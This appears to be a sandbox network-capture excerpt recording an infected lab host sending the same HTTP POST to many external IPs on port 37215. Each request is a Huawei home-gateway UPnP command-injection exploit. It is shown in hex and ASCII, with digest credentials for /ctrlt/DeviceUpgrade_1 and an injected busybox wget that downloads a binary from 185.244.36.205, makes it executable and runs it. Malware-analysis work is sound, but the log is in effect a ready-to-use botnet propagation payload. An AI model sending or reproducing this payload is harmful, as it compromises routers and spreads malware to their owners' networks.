                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1752192.168.2.155848431.185.212.16637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945946932 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1753192.168.2.1555374138.58.77.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945969105 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1754192.168.2.155205094.34.141.13537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945983887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1755192.168.2.1555894157.51.52.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946027994 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1756192.168.2.154146694.220.104.22737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946032047 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1757192.168.2.1548824197.44.55.17937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946065903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1758192.168.2.1549872157.252.155.10137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946090937 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1759192.168.2.1554090202.173.40.18337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946119070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1760192.168.2.1554852138.92.208.9337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946132898 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1761192.168.2.153735043.192.196.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946156979 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
